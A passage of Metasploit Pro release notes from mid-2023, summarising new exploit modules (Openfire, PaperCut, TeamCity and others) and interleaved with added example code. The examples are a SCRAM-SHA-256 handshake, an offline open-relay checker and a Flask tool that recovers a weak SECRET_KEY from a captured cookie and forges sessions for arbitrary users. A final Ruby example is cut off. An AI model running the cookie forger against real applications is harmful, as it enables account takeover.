  • Adds a new module that exploits an unauthenticated command injection vulnerability in OpenTSDB through 2.4.1 resulting in root access.
  • Adds an exploit module that leverages a command injection vulnerability in TOTOLINK X5000R Wireless Gigabit Router firmware X5000R_V9.1.0u.6118_B20201102. This allows remote code execution as the user running the web server, typically the root user.
  • Adds an unauthenticated RCE for JetBrains' TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.
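
The PostgreSQL bullet above says the modules now speak SASL SCRAM-SHA-256 (RFC 7677, PostgreSQL's scram-sha-256 password method). The following is an added illustration written for this page, not Metasploit's library code: it runs both sides of the four-message exchange in memory so the key derivation and proof check can be read in one place. Assumptions: the PostgreSQL message framing (AuthenticationSASL/SASLInitialResponse) is omitted, channel binding is not negotiated (the "n,," header and c=biws), SASLprep of the password is skipped, and the username is carried in n= even though libpq sends an empty n= because PostgreSQL takes the role name from the startup packet.

```python
import base64
import hashlib
import hmac
import secrets


def _h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def _hmac(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.sha256).digest()


def scram_keys(password: str, salt: bytes, iterations: int):
    """SaltedPassword = PBKDF2-HMAC-SHA-256(password, salt, i); derive the three SCRAM keys."""
    salted = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    client_key = _hmac(salted, b"Client Key")
    stored_key = _h(client_key)
    server_key = _hmac(salted, b"Server Key")
    return client_key, stored_key, server_key


def _attrs(message: str) -> dict:
    # "k=v,k=v" attribute list; nonce and base64 values never contain commas
    return dict(kv.split("=", 1) for kv in message.split(","))


class ScramServer:
    """Verifier side. Like pg_authid, it keeps only salt, iterations, StoredKey and ServerKey."""

    def __init__(self, password: str, iterations: int = 4096, salt: bytes = None):
        self.salt = salt or secrets.token_bytes(16)
        self.iterations = iterations
        _, self.stored_key, self.server_key = scram_keys(password, self.salt, iterations)

    def first(self, client_first: str) -> str:
        # strip the "n,," GS2 header; the bare message is part of AuthMessage
        self.client_first_bare = client_first.split(",", 2)[2]
        client_nonce = _attrs(self.client_first_bare)["r"]
        self.nonce = client_nonce + secrets.token_urlsafe(18)  # server nonce must extend the client nonce
        salt_b64 = base64.b64encode(self.salt).decode()
        self.server_first = f"r={self.nonce},s={salt_b64},i={self.iterations}"
        return self.server_first

    def final(self, client_final: str) -> str:
        without_proof, _, proof_b64 = client_final.rpartition(",p=")
        if _attrs(without_proof)["r"] != self.nonce:
            raise ValueError("nonce mismatch")
        proof = base64.b64decode(proof_b64)
        if len(proof) != 32:
            raise ValueError("malformed proof")
        auth_message = ",".join([self.client_first_bare, self.server_first, without_proof]).encode()
        client_signature = _hmac(self.stored_key, auth_message)
        # ClientKey = ClientProof XOR ClientSignature; the server checks H(ClientKey) == StoredKey
        client_key = bytes(p ^ s for p, s in zip(proof, client_signature))
        if not hmac.compare_digest(_h(client_key), self.stored_key):
            raise ValueError("bad proof")
        return "v=" + base64.b64encode(_hmac(self.server_key, auth_message)).decode()


class ScramClient:
    def __init__(self, user: str, password: str):
        self.user, self.password = user, password
        self.client_nonce = secrets.token_urlsafe(18)

    def first(self) -> str:
        self.client_first_bare = f"n={self.user},r={self.client_nonce}"
        return "n,," + self.client_first_bare  # "n" = client does not support channel binding

    def final(self, server_first: str) -> str:
        attrs = _attrs(server_first)
        nonce, salt, iterations = attrs["r"], base64.b64decode(attrs["s"]), int(attrs["i"])
        if not nonce.startswith(self.client_nonce):
            raise ValueError("server nonce does not extend ours")
        client_key, stored_key, server_key = scram_keys(self.password, salt, iterations)
        without_proof = f"c=biws,r={nonce}"  # c=biws is base64("n,,")
        auth_message = ",".join([self.client_first_bare, server_first, without_proof]).encode()
        client_signature = _hmac(stored_key, auth_message)
        proof = bytes(k ^ s for k, s in zip(client_key, client_signature))
        self.expected_server_signature = _hmac(server_key, auth_message)
        return without_proof + ",p=" + base64.b64encode(proof).decode()

    def verify_server(self, server_final: str) -> bool:
        return hmac.compare_digest(base64.b64decode(server_final[2:]), self.expected_server_signature)


def run_handshake(user: str, client_password: str, server_password: str) -> bool:
    """Drive the four SCRAM messages in memory; True only if both sides authenticate each other."""
    server = ScramServer(server_password)
    client = ScramClient(user, client_password)
    server_first = server.first(client.first())
    try:
        server_final = server.final(client.final(server_first))
    except ValueError:
        return False
    return client.verify_server(server_final)


if __name__ == "__main__":
    print("correct password:", run_handshake("postgres", "pencil", "pencil"))
    print("wrong password:  ", run_handshake("postgres", "wrong", "pencil"))
```

Two practitioner points fall out of the code: a brute-force module must redo the PBKDF2 work (4096 iterations by default) for every guess, which is why SCRAM logins are slower than md5 logins, and the client must refuse a server nonce that does not start with its own nonce, otherwise a man-in-the-middle can substitute a fresh challenge. Note also that a pg_authid verifier (StoredKey and ServerKey) lets an attacker impersonate the server but does not by itself yield the ClientKey needed to log in.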
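
The smtp_relay bullet above describes the EHLO-then-HELO fallback and the relay probe. The block below is an added example written for this page, not the module's own code: a small open-relay check that mirrors that logic, run against a scripted in-memory server so it works offline. The server, its hostnames (.invalid and .test names) and its reply strings are all constructed for the example; a real check would send the same commands over a socket.

```python
import re


class ScriptedSmtpServer:
    """Constructed stand-in for a mail server so the check runs offline.
    supports_ehlo=False imitates an old server that only understands HELO;
    open_relay=True imitates a server that accepts RCPT TO for foreign domains."""

    def __init__(self, supports_ehlo=True, open_relay=False,
                 hostname="mail.example.test", local_domain="example.test"):
        self.supports_ehlo = supports_ehlo
        self.open_relay = open_relay
        self.hostname = hostname
        self.local_domain = local_domain
        self.greeted = False
        self.transcript = []  # ("C", line) / ("S", line) pairs for inspection

    def banner(self):
        reply = [f"220 {self.hostname} ESMTP (constructed test server)"]
        self.transcript += [("S", line) for line in reply]
        return reply

    def handle(self, command):
        self.transcript.append(("C", command))
        verb, _, arg = command.partition(" ")
        verb = verb.upper()
        if verb == "EHLO":
            if self.supports_ehlo:
                self.greeted = True
                reply = [f"250-{self.hostname}", "250-8BITMIME", "250 SIZE 10240000"]
            else:
                reply = ["502 5.5.2 Error: command not recognized"]
        elif verb == "HELO":
            self.greeted = True
            reply = [f"250 {self.hostname}"]
        elif verb == "MAIL":
            reply = ["250 2.1.0 Ok"] if self.greeted else ["503 5.5.1 Error: send HELO/EHLO first"]
        elif verb == "RCPT":
            match = re.search(r"<[^@>]+@([^>]+)>", arg)
            domain = match.group(1).lower() if match else ""
            if domain == self.local_domain or self.open_relay:
                reply = ["250 2.1.5 Ok"]
            else:
                reply = ["554 5.7.1 Relay access denied"]
        elif verb == "QUIT":
            reply = ["221 2.0.0 Bye"]
        else:
            reply = ["500 5.5.2 Error: command not recognized"]
        self.transcript += [("S", line) for line in reply]
        return reply


def reply_code(reply):
    # the last line of a multi-line reply reads "NNN text"; continuation lines read "NNN-text"
    return int(reply[-1][:3])


def check_open_relay(server, helo_name="probe.invalid",
                     mail_from="relaytest@probe.invalid",
                     rcpt_to="relaytest@external.invalid"):
    """EHLO first, HELO on a 5xx, then probe whether an external recipient is accepted."""
    if reply_code(server.banner()) != 220:
        return {"relay": False, "error": "unexpected banner"}
    greeting = "EHLO"
    if reply_code(server.handle(f"EHLO {helo_name}")) >= 500:
        greeting = "HELO"  # server predates ESMTP or rejects EHLO; fall back as the module does
        if reply_code(server.handle(f"HELO {helo_name}")) != 250:
            return {"relay": False, "error": "neither EHLO nor HELO accepted"}
    if reply_code(server.handle(f"MAIL FROM:<{mail_from}>")) != 250:
        server.handle("QUIT")
        return {"relay": False, "error": "MAIL FROM rejected", "greeting": greeting}
    rcpt_code = reply_code(server.handle(f"RCPT TO:<{rcpt_to}>"))
    server.handle("QUIT")
    # 250/251 means the server accepts (or will forward) mail for a domain it is not responsible for
    return {"relay": rcpt_code in (250, 251), "greeting": greeting, "rcpt_code": rcpt_code}


if __name__ == "__main__":
    legacy = ScriptedSmtpServer(supports_ehlo=False, open_relay=True)
    print(check_open_relay(legacy))
    for side, line in legacy.transcript:
        print(side, line)
```

The probe only means something when the recipient domain is one the server is not responsible for; a 250 to a local recipient is normal delivery, not relaying, so keep the RCPT TO address external to the target.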
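
The Flask session-signing bullet above (and CVE-2023-27524, where Apache Superset shipped with a guessable SECRET_KEY) rests on one fact: whoever knows the key can mint any session. The block below is an added example for this page, not the Metasploit modules' code. It reimplements Flask's default cookie format (itsdangerous URLSafeTimedSerializer with salt "cookie-session", HMAC key derivation and SHA-1) so a captured cookie can be tested against a list of candidate keys and, if one matches, a cookie for any session contents can be forged. The key names and session contents in the test are constructed; the candidate list in the demo is a placeholder to be replaced with the defaults you are actually checking for.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

# Flask's SecureCookieSessionInterface defaults
SESSION_SALT = b"cookie-session"


def _b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(enc: bytes) -> bytes:
    return base64.urlsafe_b64decode(enc + b"=" * (-len(enc) % 4))


def _signature(secret_key: bytes, value: bytes) -> bytes:
    # itsdangerous "hmac" key derivation: signing key = HMAC-SHA1(secret_key, salt)
    derived = hmac.new(secret_key, SESSION_SALT, hashlib.sha1).digest()
    return hmac.new(derived, value, hashlib.sha1).digest()


def sign_session(secret_key: bytes, session: dict, timestamp: Optional[int] = None) -> str:
    """Produce a cookie value Flask would accept as a session signed with secret_key."""
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:
        body = b"." + _b64e(compressed)  # a leading "." marks a zlib-compressed payload
    else:
        body = _b64e(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    unsigned = body + b"." + _b64e(ts_bytes)
    return (unsigned + b"." + _b64e(_signature(secret_key, unsigned))).decode()


def verify_session(secret_key: bytes, cookie: str) -> Optional[dict]:
    """Return the decoded session if cookie was signed with secret_key, else None."""
    raw = cookie.encode()
    unsigned, sep, sig = raw.rpartition(b".")
    if not sep or not hmac.compare_digest(_b64e(_signature(secret_key, unsigned)), sig):
        return None
    body, _, _ts = unsigned.rpartition(b".")
    payload = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
    return json.loads(payload)


def find_secret_key(cookie: str, candidates) -> Optional[bytes]:
    """Test a captured session cookie against candidate (default or leaked) SECRET_KEY values."""
    for key in candidates:
        if verify_session(key, cookie) is not None:
            return key
    return None


if __name__ == "__main__":
    # Placeholder candidate list (constructed); substitute the defaults you are checking for.
    candidates = [b"CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET", b"example-weak-key"]
    captured = sign_session(b"example-weak-key", {"_user_id": "2"})
    hit = find_secret_key(captured, candidates)
    print("key recovered:", hit)
    if hit:
        print("forged:", sign_session(hit, {"_user_id": "1"}))  # any session the app will trust
```

Because the signature covers the timestamp, a forged cookie also carries whatever timestamp the attacker chooses, so PERMANENT_SESSION_LIFETIME offers no protection once the key is known; the only fix is rotating SECRET_KEY, which invalidates every existing session.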

New in Metasploit Pro 4.22.2 (July 31, 2023) (Aug 3, 2023)

  • Improved:
  • Pro: We added an 'Auto' selection to payload dropdowns to pick the most appropriate payload type automatically.
  • PR 17681 - This PR adds a new datastore option for Jenkins home directory to the jenkins_gather module.
  • PR 18096 - Updates the LDAP query module and the Kerberos authentication support for WinRM/MSSQL/SMB/LDAP/etc. to now work in conjunction with the user's Proxies datastore value, i.e. set Proxies socks5:127.0.0.1:1080.
  • Fixed:
  • Pro: We corrected table select-all population of various action forms.
  • PR 18187 - Fixes a crash when running Ruby 3.3.0-preview1 with modules that used invalid syntax when packing or unpacking binary data.
  • PR 18213 - This fixes a bug in the evasion/windows/syscall_inject module that was caused by an uninitialized variable.
  • PR 18225 - This PR fixes multiple missing and invalid references in modules.
  • Modules:
  • PR 18142 - This PR adds a WordPress exploit that makes use of the WordPress File Manager Advanced Shortcode 2.3.2 plugin to gain unauthenticated remote code execution through a shortcode.
  • PR 18173 - This PR adds a module for CVE-2023-32315, a remote code execution vulnerability affecting all versions of Openfire released since April 2015, starting with version 3.10.0. Patched versions are 4.7.5+, 4.6.8+ and 4.8.0+.
  • PR 18182 - This PR adds an auxiliary module that takes advantage of CVE-2023-26876 to retrieve the username and password hash from Piwigo v13.5.0 and earlier.
  • PR 18199 - This adds an exploit module that leverages a pre-authentication command injection vulnerability in VMware Aria Operations for Networks (formerly vRealize Network Insight). Versions from 6.2 to 6.10 are vulnerable and this has been identified as CVE-2023-20887. The module bypasses the reverse proxy that protects access to the Apache Thrift RPC interface and executes arbitrary commands on the underlying operating system as the root user.

New in Metasploit Pro 4.22.1 (July 6, 2023) (Jul 6, 2023)

  • Improved:
  • PR 17796 - This adds reporting to the database for the AWS EC2 enumeration module.
  • PR 17901 - This adds additional Payload module metadata to Metasploit's JSON module cache to improve msfconsole's bootup time.
  • PR 17959 - The login scanner modules have been updated to catch any exceptions that may be raised when testing a credential. Additionally the SNMP scanner and PostgreSQL scanners have been updated to catch additional errors that may be thrown when testing credentials.
  • PR 18114 - This updates the post/windows/manage/execute_dotnet_assembly module to allow it to run the .NET assembly within the current process. The module can now also read the output from all injection techniques.
  • PR 18133 - This improves the execute_dotnet_assembly module's ability to correctly identify the signature of the main method. Users no longer need to know and specify it themselves.
  • Fixed:
  • PR 18065 - This updates the jenkins_gather module to work with newer versions of Jenkins.
  • PR 18121 - This adds a proper ASN.1 parser using RASN1 for the x509 SubjectAltName field.
  • PR 18139 - An intermittent segfault issue when running the getuid command within a Windows Python Meterpreter has been fixed.
  • PR 18146 - This fixes an intermittent issue with Windows Meterpreter which caused 'Access Denied' errors when Meterpreter attempted to get or set the clipboard data when either the user or another application was also manipulating the clipboard.
  • Modules:
  • PR 18134 - This PR adds a module which exploits CVE-2023-25194, an unauthenticated deserialization vulnerability which leads to RCE in Apache Druid.

New in Metasploit Pro 4.22.1 (June 23, 2023) (Jun 26, 2023)

  • Improved:
  • Pro: We added support for adhoc Nexpose/InsightVM connection dialogs to be submitted upon completion using the Enter key and improved the error reporting for this dialog.
  • This PR adds new code to simplify and standardize Windows version checking and comparisons.
  • Adds support for module writers to supply a custom include_dirs array when using the MinGW library to compile payloads.
  • The ms15_034_http_sys_memory_dump.rb module has been updated to improve its handling of the check_host function so that the information about target exploitability is more accurate.
  • The script generated by the web_delivery module is blocked by the Antimalware Scan Interface (AMSI) on newer versions of Windows. This PR includes an enhancement which allows the web_delivery module to bypass AMSI.
  • Reduces the size of PHP payloads such as php/reverse_php.
  • Adds a new post/test/all module which will run all available post/test modules against the open session.
  • A new mixin has been added to support detecting the architecture of the host OS on Windows systems. Support for other OSes will be added at a later date.
  • The grafana_plugin_traversal module has been updated to support beta and pre-release versions of Grafana.
  • The archer_c7_traversal module has been converted to a gather module and updated to include a check method so that users can appropriately check if a target is an Archer router or not.
  • This updates the LDAP server library to handle unbind requests.
  • This adds support to the auxiliary/admin/dcerpc/icpr_cert module to issue certificates for an explicit SID by specifying it within the NTDS_CA_SECURITY_EXT. This addition ensures that ESC1 will remain exploitable when issuing certificates with an SID becomes a requirement.
  • Adds support for the masm output format when generating payloads.
  • This PR updates Meterpreter's setg SessionTLVLogging true support to no longer truncate useful values such as payload UUIDs, file paths, executed commands etc.
  • Update test post modules to always have a clean, writable, and consistent test file system directory when running modules under the loadpath test/modules directory.
  • When running test modules that have been loaded by loadpath test/modules, any verbose printing logic generated will now be prefixed by the current test that is being run.
  • This PR updates unknown windows errors on python meterpreter to include original error code.
  • This adds Windows 10 revision number extraction to the Windows version Post API.
  • This PR updates the User Agent strings for June 2023.
  • This adds support for only running user specified test names in modules loaded by running loadpath test/modules.
  • This PR adds additional logging to the test/file module. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
  • This PR adds additional test/railgun_reverse_lookup tests for macOS and Linux.
  • Payload Enhancements:
  • The Metasploit Payloads gem has been bumped, bringing in several changes, such as the ability to change memory protections and query process memory on Python Meterpreter on Windows. Additionally, documentation on how to build and run the Java Meterpreter on a Mac has been updated, along with our README file, and some bugs were fixed.
  • Fixed:
  • Pro: Fixed issue with urls on web vulnerabilities index view.
  • Pro: We improved scaling support for exploring related modules in projects with large asset and vulnerability counts.
  • This fixes a bug where adding and deleting tags to multiple hosts was not functioning correctly.
  • Two bugs have been fixed in post/multi/manage/shell_to_meterpreter: one was caused by a lack of validation on the payload being used when using the PAYLOAD_OVERRIDE option to ensure the payload was valid, and one was caused by the module creating a handler but failing to pass the RHOST information along, causing the handler to run with an invalid configuration.
  • This fixes a Python payload issue on Windows, where execution failed because bytes arguments are not allowed on Windows.
  • This PR updates Jenkins modules to work with newer versions. Previously they fell over with a CSRF failure and gave a false negative result.
  • Adds additional skip calls to the test/post modules to ensure that only relevant test expectations are run against the specified session without crashes.
  • This PR fixes the issue where an ArgumentError was thrown on the FETCH_SRVHOST option when running the info command when using a fetch payload.
  • This updates the post/multi/gather/aws_keys module to mark the platforms it is compatible with.
  • A bug has been fixed whereby command stager progress could go over 100%. This has now been fixed so that command stager progress should never go over 100%.
  • Fixes a bug that caused multi/manage/shell_to_meterpreter to not break when win_transfer=VBS was set.
  • A typo has been fixed in the exploits/multi/http/gitlab_github_import_rce_cve_2022_2992 module that prevented proper exception handling from occurring, and additional YARD documentation has been added for some related functions that were missing appropriate documentation on the exceptions they might throw.
  • This fixes a bug in the Windows Meterpreter's memory free API.
  • A bug has been fixed in the stdapi extension of Meterpreter when calling the stdapi_sys_process_memory_free command. This incorrectly handled memory, leading to a double free condition, which would crash Meterpreter. This has since been fixed.
  • The auxiliary/admin/kerberos/keytab EXPORT action will now consistently order exported entries.
  • Fixes an edge case with windows/meterpreter/reverse_tcp where there was a small chance of an invalid stager being created.
  • This PR fixes Python Meterpreter sessions from crashing when extracting macOS network configuration when using the route or ipconfig commands.
  • Fixes rex-text crashes when running Ruby 3.3.
  • This PR fixes Python Meterpreter subprocess deadlock and file descriptor leak caused by the stdout/stderr file descriptors not being closed.
  • This PR fixes a Python Meterpreter macOS route command crash when ifconfig has a gateway name as a mac address separated by dots.
  • This PR adds a fix for false negatives when checking whether files exist on Windows Python Meterpreter.
  • This PR fixes the issue that falsely caused empty file reads on Meterpreter.
  • Fixes a bug when running the time command in msfconsole with complex commands.
  • Updates the test/services module to more consistently pass. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
  • This PR fixes an uninitialized constant error when Meterpreter registry key reads time out.
  • This PR fixes a symlink test bug when running Python Meterpreter on Windows.
  • Fixes the broken test/extapi module. The module was facing issues returning clipboard data that pertained to the session being tested, this issue has been resolved. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
  • This PR reverts the changes from #17942, which was an improvement to the AMSI bypass on new versions of Windows. PR #17942 broke psexec, and this PR reverts that change.
  • Modules:
  • Adds a new rpyc_rce module to exploit CVE-2019-16328 and achieve remote command execution as the vulnerable server's service user.
  • This adds an exploit module that leverages an authentication bypass to get remote code execution on PaperCut NG version 8.0.0 to 19.2.7 (inclusive), version 20.0.0 to 20.1.6 (inclusive), version 21.0.0 to 21.2.10 (inclusive) and version 22.0.0 to 22.0.8 (inclusive). This vulnerability is identified as CVE-2023-27350. Due to an improper access control in the SetupCompleted class, it is possible to bypass authentication and abuse the built-in scripting functionality for printers to obtain code execution as the SYSTEM user on Windows and the less privileged papercut user on Linux.
  • This adds an exploit for CVE-2023-21839 which is an unauthenticated RCE in Oracle Weblogic. Successful exploitation results in remote code execution as the oracle user.
  • This adds a command payload module that creates a new privileged user on a *nix target system.
  • This adds an exploit for CVE-2023-28771 which is a remote, unauthenticated OS command injection in the IKE service of several Zyxel devices. Successful exploitation results in remote command execution as the root user.
  • This adds an exploit module for CVE-2023-29084 which is an authenticated RCE in Zoho ManageEngine ADManager Plus. A remote attacker can leverage this vulnerability to execute OS commands by crafting a request to update the server's configuration. The modified configuration's value is restored by the exploit once it is completed. This exploit is incompatible with HTTP payloads due to the exploit modifying the HTTP proxy configuration of the server during exploitation.
  • This adds the post/windows/manage/make_token module which is capable of creating new tokens from known credentials and then setting them in a running instance of Meterpreter, which can allow that session to access resources it might not have previously been able to access.
  • This adds an exploit that leverages an unauthenticated arbitrary file read (path traversal) in GitLab 16.0.0. This vulnerability is identified as CVE-2023-2825.
  • Add MIPS64 Linux Fetch Payloads.
  • This adds an exploit for TerraMaster NAS devices running TOS 4.x versions. The logic in include/makecvs.php permits shell metacharacters through the Event parameter in a GET request, permitting the upload of a webshell without authentication. Through this, an attacker can achieve remote code execution as the user running the TOS web interface.
  • This exploits a series of vulnerabilities including session crafting and command injection in TerraMaster NAS versions 4.2.15 and below to achieve unauthenticated RCE as the root user.
  • A module has been added for CVE-2023-1133, an unauthenticated .NET deserialization vulnerability in Delta Electronics InfraSuite Device Master versions below v1.0.5 in the ParseUDPPacket() method of the 'Device-Gateway-Status' process. Successful exploitation leads to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.
  • This PR adds a version scanner for Apache RocketMQ.
  • This adds an exploit for Symmetricom SyncServer appliances (S100-S300 series) vulnerable to an unauthenticated command injection in the hostname parameter in a request to the /controller/ping.php endpoint. The command injection vulnerability is patched in the S650 v2.2. Requesting the endpoint will result in a redirect to the login page; however, the command will still be executed, resulting in RCE as the root user.
  • This exploits an administrative password leak and command injection vulnerability on TerraMaster devices running TerraMaster Operating System (TOS) versions 4.2.29 and below to achieve unauthenticated RCE as the root user.
  • Adds a new module targeting the MOVEit Transfer web application that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.

New in Metasploit Pro 4.22.1 (June 05, 2023) (Jun 7, 2023)

  • New:
  • Pro - We added a new overview card that is displayed when a project has pending scheduled task chains.
  • Improved:
  • PR 17989 - The auxiliary/admin/kerberos/inspect_ticket and auxiliary/admin/kerberos/forge_ticket modules have been updated to visually represent the decoded binary values of the Kerberos ticket fields.
  • PR 18021 - The Powershell Post API methods use a mix of Powershell and .NET methods which have different ways of keeping track of the current working directory. This change fixes the ambiguity by synchronizing the current working directory referenced by each set of methods.
  • PR 18031 - Updates the edit and log commands to explain how to set LocalEditor and LocalPager so users can adjust the editor that is used when running the edit command or the pager used for viewing the log file that holds module runtime information.
  • Fixed:
  • Pro - We fixed an issue with deleting credentials from a workspace.
  • PR 18009 - This PR updates the msfdb commands to no longer enable the web service by default. The web service will now be enabled with the web service flag: --msf-data-service <NAME>.
  • PR 18010 - Fixes an edge-case crash when running smb_login with Kerberos auth activated.
  • PR 18015 - Deletes a dead link from the Using Metasploit page.
  • PR 18019 - Fixes validation for the to_handler command when running Evasion and Payload modules.
  • PR 18024 - This PR fixes an issue with credentials being normalized to lowercase inconsistently, causing collisions with uppercase data. Relevant credentials are now automatically normalized to lowercase on insert and lookup.
  • PR 18026 - A bug has been fixed in test modules where not all modules were manipulating the load path to require the module_test library correctly, resulting in them being dependent on other modules correctly setting the load path, which may not always occur.
  • PR 18030 - A missing return statement was added into lib/msf/core/exploit/cmd_stager/http.rb to fix a Ruby syntax error when attempting to handle a 404 not found case.
  • PR 18032 - A bug has been fixed in the cmd/brace encoder where it did not appropriately escape braces.
  • PR 18036 - A typo has been fixed in the ibm_sametime_enumerate_users.rb gather module that prevented exceptions that were raised from being appropriately caught.
  • PR 18052 - The test/modules/post/test/file.rb module previously did not work on Windows sessions due to it reading data from a Linux only file to determine what data to write for the binary file write operation. This has since been fixed so that the binary data is randomly generated vs being based off an OS specific file.
  • Modules:
  • PR 17430 - This adds the ability for Metasploit to establish sessions to EC2 instances using Amazon's SSM interface. The result is an interactive shell that does not require the user to transfer a payload to the EC2 instance. For Windows targets, the shell is a PTY-enabled PowerShell session that is incompatible with Post modules but supports user interaction.
  • PR 17899 - This adds a scanner module that leverages an authorization bypass in Dolibarr version 16, prior to 16.0.5. This module dumps the contact database to retrieve customer file, prospects, suppliers and employee information. No authentication is needed for this exploit.
  • PR 17929 - This adds an exploit for CVE-2023-22809, an LPE within sudoedit. The exploit currently only supports Ubuntu 22.04 and 22.10.
  • PR 17965 - This adds an auxiliary module that can create, read, update, and delete certificate template objects from Active Directory.
  • PR 18003 - This adds a scanner module that gathers a specific file by leveraging a directory traversal vulnerability in TP-Link Archer C7 routers. This vulnerability is identified as CVE-2015-3035.
  • PR 18004 - This PR adds an auxiliary module for DoSing a VSFTPD server from version 2.3.2 and below.
  • PR 18025 - This PR adds a version scanner for Apache NiFi.
  • PR 18028 - A new scanner module has been added to scan for valid logins for Apache NiFi servers.

New in Metasploit Pro 4.22.1 (May 22, 2023) (May 24, 2023)

  • Improved:
  • Pro: We have updated the Java VM used for reporting to maintain a strong security posture.
  • PR 17060 - Updates the HTTP scanner modules with the functionality to log both HTTP requests and responses. This functionality can be enabled with set HTTPTrace true. This functionality is useful for debugging modules. In scenarios where the traffic is encrypted, for instance with WinRM, the logged values will be unencrypted.
  • PR 17807 - Adds documentation for Metasploit's folder structure, so that those unfamiliar with Metasploit can quickly get up to speed and understand where files might be located or where to place new files when developing content for Metasploit.
  • PR 17972 - Updates the example modules to align with the latest Metasploit framework module conventions.
  • PR 17985 - Fixes a typo in the post/windows/manage/sticky_keys module.
  • PR 17990 - Adds AutoCheck functionality and notes metadata to exploits/aix/local/ibstat_path.
  • PR 17991 - A default configuration file has been added for Solargraph (from https://solargraph.org/), a language server that can help VS Code users and users of other code editors which might not have a language server built in obtain IntelliSense, inline documentation, and code completion functionality for Metasploit's code. For VS Code users, it is recommended to install the Solargraph plugin from https://marketplace.visualstudio.com/items?itemName=castwide.solargraph to take advantage of this change.
  • Fixed:
  • PR 17967 - Fixes Ruby 3.1 crashes and resource leaks when garbage collecting Meterpreter resources.
  • PR 17968 - A bug has been fixed where Certificate Templates were not being identified as vulnerable when there was an ACE that granted enrollment rights but did not correspond to any object types. The logic has now been updated so that only ACEs associated with an object that is neither the CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT right nor the CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT right will be ignored.
  • PR 17980 - This fixes the file system path check used by Powershell sessions.
  • PR 18005 - This PR fixes a crash when running a module through socks 4a proxy.
  • PR 18006 - This PR fixes an error when msfconsole opens browser links without a display present.
  • Modules:
  • PR 17133 - A new exploit module has been added which gains authenticated RCE on ManageEngine AdAudit builds 7005 and prior by creating a custom alert profile and leveraging the custom alert script component. On builds 7004 and later, CVE-2021-42847 is utilized to gain RCE via an arbitrary file write to create the necessary script for the alert profile.
  • PR 17782 - This adds a set of command payloads that facilitate fetching and executing a payload file from Metasploit.
  • PR 17881 - This adds a new exploit module that leverages multiple vulnerabilities in the zhttpd and zcmd binaries, which are present on more than 40 Zyxel routers and CPE devices, to achieve remote code execution as user supervisor. This chains a local file disclosure vulnerability that allows an unauthenticated attacker to read the configuration file and a weak password derivation algorithm vulnerability.
  • PR 17964 - A new module has been added which exploits Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x. To do this it first exploits CVE-2022-43939 to bypass authentication before then using CVE-2022-43769, a Server Side Template Injection (SSTI) vulnerability, to achieve unauthenticated code execution as the user running the Pentaho Business Analytics Server.
  • PR 17979 - An exploit has been added for CVE-2023-28128, an authenticated file upload vulnerability in versions below v6.4.0.186 of Ivanti Avalanche that allows authenticated administrators to change the default path to the web root of the application, upload a JSP file, and achieve RCE as NT AUTHORITY\SYSTEM. This occurs due to a bug whereby Ivanti Avalanche doesn't properly validate MS-DOS style short names in the configuration path.
  • PR 17993 - This module leverages a command injection vulnerability in the setuid invscout utility on AIX systems 7.2 and prior to achieve effective-uid root privileges.
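The following Ruby is an added illustration of the ACE filter described in the PR 17968 entry above; it is example code, not Metasploit's own library code. It places the corrected rule next to the old one: an ACE that grants control access and names no object type now counts as an enrollment grant, while an ACE naming some unrelated extended right is still ignored. The two enrollment GUIDs are the published AD schema rightsGuid values; the domain SIDs, the sample DACL and the simplified access-mask check are constructed for the example.

```ruby
require 'set'

# Published AD schema rightsGuid values for the two enrollment extended rights.
CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT     = '0e10c968-78fb-11d2-90d4-00c04f79dc55'.freeze
CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT = 'a05b8cc2-17bc-11d2-93ea-00c04f79dc55'.freeze
ENROLLMENT_RIGHTS = Set[CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT,
                        CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT].freeze

# ADS_RIGHT_DS_CONTROL_ACCESS: the access-mask bit that grants extended rights.
# (Simplification: a real check would also honour GENERIC_ALL and similar.)
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100

# Simplified ACE. object_type is nil when the ACE carries no object GUID
# (a plain ACCESS_ALLOWED_ACE, or an object ACE without ACE_OBJECT_TYPE_PRESENT);
# the granted rights then apply to every extended right on the object.
Ace = Struct.new(:sid, :access_mask, :object_type, keyword_init: true)

# Corrected rule: keep the ACE if it grants control access and either names
# no object type at all or names one of the two enrollment rights.
def grants_enrollment?(ace)
  return false if (ace.access_mask & ADS_RIGHT_DS_CONTROL_ACCESS).zero?

  ace.object_type.nil? || ENROLLMENT_RIGHTS.include?(ace.object_type.downcase)
end

# Previous (buggy) rule, for comparison: a typeless ACE never matched, so a
# template granting Domain Users control access over everything was missed.
def grants_enrollment_old?(ace)
  return false if (ace.access_mask & ADS_RIGHT_DS_CONTROL_ACCESS).zero?

  !ace.object_type.nil? && ENROLLMENT_RIGHTS.include?(ace.object_type.downcase)
end

# SIDs that can enroll in the template under the given rule.
def enrollment_sids(aces, rule: method(:grants_enrollment?))
  aces.select { |ace| rule.call(ace) }.map(&:sid).uniq
end

# Constructed sample DACL (fictional domain SIDs).
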